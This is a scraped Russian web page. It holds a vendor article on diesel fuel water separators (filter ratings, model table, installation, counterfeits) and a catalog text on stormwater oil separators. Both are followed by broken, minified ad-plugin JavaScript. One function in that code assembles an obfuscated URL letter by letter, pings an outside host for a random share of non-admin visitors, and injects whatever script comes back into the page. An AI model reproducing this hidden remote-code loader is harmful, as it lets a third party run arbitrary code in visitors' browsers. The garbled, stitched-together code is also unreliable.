Если зимняя эксплуатация периодическая или отсутствует — можно сэкономить и подогрев не устанавливать.В крайнем случае, при необходимости, его можно будет установить позже.

Фильтрующий элемент

Для различных условий работы производители предлагают использовать различные типы фильтрующих элементов, отличающихся материалом и размером пор.У сепараторов BALDWIN DAHL это 2, 10 и 30 микрон.У SEPAR 2000 — 10, 30 и 60 микрон (встречается упоминание о том, что фильтрующий элемент 10 микрон Separ 2000 предназначен только для бензина).

Применительно к продукции BALDWIN DAHL для теплого времени года рекомендуется использовать фильтрующий элемент 2 микрона.Для холодного времени — фильтрующий элемент 10 микрон (в обозначении такого элемента содержится буква W — Winter).

Для сильно загрязненного топлива и устаревших двигателей — элементы 30 микрон.

Для сепараторов SEPAR 2000 можно использовать фильтрующие элементы 30 микрон.Для сильно загрязненного топлива — металлическую сетку 60 микрон.

Конечно, чем меньше размер пор фильтрующего элемента, тем лучше будет очищено топливо.Но существует и оборотная сторона медали.Более мелкий фильтр быстрее забивается, увеличивая гидравлическое сопротивление системы.

В холодное время года даже допустимое естественное загустевание топлива может привести к невозможности использования мелкого фильтра.Поэтому надо выбирать фильтрующий элемент как можно мельче, но обязательно с учетом конкретного двигателя и условий работы.

Современная прецизионная топливная аппаратура, в особенности Common Rail, очень чувствительна к качеству топлива, поэтому на сменных элементах экономить не стоит — ремонт выйдет намного дороже.

При интенсивной эксплуатации двигателя для контроля гидравлического сопротивления за фильтром можно установить вакуумметр.В этом случае сигналом для замены фильтра будут служить определенные показания вакуумметра.

Выбор производителя

Перефразируя сатирика, в большинстве случаев можно утверждать: «все сепараторы одинаково полезны». Речь идет, разумеется, об известных брэндах вроде BALDWIN DAHL, SEPAR 2000, PARKER RACOR, STANADYNE, MANN PreLine.Почти у каждого производителя есть в запасе патентованная технология, позволяющая добиться практически 100%-ной очистки топлива от воды и твердых примесей.

У BALDWIN DAHL это депрессюризатор — конус, на поверхности которого происходит разделение.

У SEPAR 2000 это пассивный циклон — спиралевидная поверхность, способствующая разделению легких и тяжелых фракций топлива под действием центробежной силы.

После первичного разделения тяжелая фракция (вода и твердые частицы) остается в отстойнике, а легкая (очищенное дизельное топливо) поднимается к фильтру тонкой очистки, попутно освобождаясь от более мелких капель воды и загрязняющих частиц.

Поэтому, выбирая, например, между BALDWIN DAHL и SEPAR 2000, достаточно руководствоваться рабочими характеристиками устройств, их габаритами, ценой и доступностью для покупки.

Результат работы похожих устройств будет примерно одинаковым.

Следующая таблица может оказаться полезной при выборе сепаратора:

Применение BALDWIN DAHL(без подогрева) BALDWIN DAHL(с подогревом) SEPAR 2000(без подогрева) SEPAR 2000(с подогревом)
Расход 75 л/час(легковые автомобили, небольшие дизели) DAHL 65 (дизель)DAHL 75 (бензин)
Расход 150 л/час(небольшие грузовики, тракторы, катера) DAHL 100 DAHL 100-H
Расход 300 л/час(тягачи, автобусы, тракторы, комбайны) DAHL 150 DAHL 150-H SWK-2000/5/50 SWK-2000/5/50/H
Расход 450 л/час(автобусы, грузовики ~1000 л.с.) DAHL 200 DAHL 200-H
Расход 600-700 л/час(тяжелые грузовики, локомотивы, стационарные генераторы) DAHL 300 DAHL 300-H SWK-2000/10 SWK-2000/10/H
Судовые двигатели высокой мощности, стационарные емкости, АЗС DAHL 500 SWK-2000/130

Установка

Во многих случаях установку сепаратора можно произвести самостоятельно.При отсутствии опыта можно обратиться на специализированный сервис.Как правило, официальные дилеры компании-производителя могут подсказать адрес такого сервиса или сами произвести установку.Для гарантийных машин нелишним будет поинтересоваться последствиями установки дополнительного устройства. 

Подделки

Как и для любого ходового товара, в случае с сепараторами существует довольно обширный рынок подделок.В лучшем случае, приобретение подделки оборачивается выброшенными деньгами.В худшем — ремонтом топливной аппаратуры.Поэтому лучший вариант покупки — приобретение у официального дилера.

МЫ РЕКОМЕНДУЕМ ИСПОЛЬЗОВАТЬ СЕПАРАТОРЫ ДИЗЕЛЬНОГО ТОПЛИВА ЛУЧШИХ ПРОИЗВОДИТЕЛЕЙ:Сепараторы дизельного топлива SEPAR 2000Сепараторы дизельного топлива BALDWIN DAHLСепараторы дизельного топлива PARKER RACORСепараторы дизельного топлива MANN PreLine

Сепараторы дизельного топлива STANADYNE Fuel ManagerПодобрать сепаратор дизельного топлива с подогревом и без (Diesel Fuel Filter / Water Separator) можно как самостоятельно, зарегистрировавшись на нашем сайте shop.tesma.com.ua, так и связавшить с нашими специалистами.

Источник: http://tesma.com.ua/article/id/343.html

Сепараторы нефтепродуктов

Фильтр сепаратор нефтепродуктов (далее ФСН) предназначены для механической очистки дождевых, талых и технических вод, загрязненных нефтепродуктами с плотностью от 750 до 950 кг/м3. В силу специфики механизма действия, сепараторы способны также частично задерживать взвешенные частицы, которые собираются в камере для сбора осадка в нижней части устройства.

ФСН нельзя применять для очистки фекальных сточных вод, а так же вод, содержащих растворенные или мылообразные масла и жиры растительного или животного происхождения. Это оборудование является проточным.

Во время прохождения сточных вод через данное оборудование, происходит механическое отделение свободных масел и средне — стабильных эмульсий от остальных субстанций.

Основные области применения ФСН

  • Автозаправочные станции
  • Зоны хранения ГСМ
  • Автомойки
  • Автомастерские
  • Свалки металлолома
  • Крытые автостоянки

Использованные материалы

Для производства фильтров-сепараторов используется полиэтилен высокого давления, полученный методом ротационного формования, с добавками, защищающими продукт от прямого действия ультрафиолетового излучения. Применение этого материала гарантирует высокую механическую прочность изделия и защиту от коррозии.

Коалесцентные кассеты изготавливаются из сорбционного материала, представляющего собой адсорбционное средство, способное улавливать на своей поверхности вещества с низкой величиной поверхностного напряжения (как, например, нефтесодержащие вещества, хлорированные углеводороды, растительные масла и жиры).

Улавливание является более интенсивным в случае веществ с более низким поверхностным напряжением, веществ с более высокой вязкостью и веществ с более полярным характером структуры. При насыщении фильтра нефтепродуктами его можно регенерировать промывкой холодной водой (хотя при этом происходит постепенное снижение сорбционных качеств).

Перед регенерацией следует проверить, не произошло ли загрязнение взвешенными веществами, которые удалить невозможно. Коалесцентный сепаратор не предназначен для очистки других сточных вод, прежде всего коммунальных стоков и вод с высоким содержанием нерастворенных веществ (выше 10 мг/л).

Примененные материалы ФСН гарантирует его коррозионную стойкость без дальнейших защитных покрытий.

Устройство

В соответствии с ГОСТ 26070 каждый фильтр-сепаратор, отвечающий выше названным критериям, включает в себя:

  • камеру для сбора взвешенных веществ – декантационный колодец;
  • камеру фильтрации — коалесцентный сепаратор с пористым фильтрующим элементом объемной фильтрации;
  • встроенный запорный предохранительный клапан с автоматическим перекрыванием;
  • пластиковые входящий и выходящий патрубки с отверстием для отбора проб, обеспечивающие подачу и отвод стоков.

Технические данные

Фильтр-сепаратор ФСН соответствует требованиям технических условий ТУ У 29.2-33290985 и принадлежит к I классу сепарации, согласно стандарту EN 858-2.

Данное оборудование производится согласно нормам ISO 9001, имеет соответствующие сертификаты и прекрасно зарекомендовало себя как недорогое и надежное решение проблемы очистки сточных вод, удовлетворяющее требованиям Российского законодательства. ФСН изготавливаются семи типоразмеров в зависимости от производительности очищаемых стоков.

Проведение исследований пробы до и после прохождения сточной воды через фильт сепаратора ФСН Показатели кач-ва Ед. изм. Методики измерения (нормативные док-ты) Дата выполнения анализа  Результат до очистки Результат после  очистки начало окончание
Взвешенные вещества мг/дм3 КНД 211.1.4.039-95 25.01.12

Источник: https://petrometal.com.ru/catalog/separatory-nefteproduktov/

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};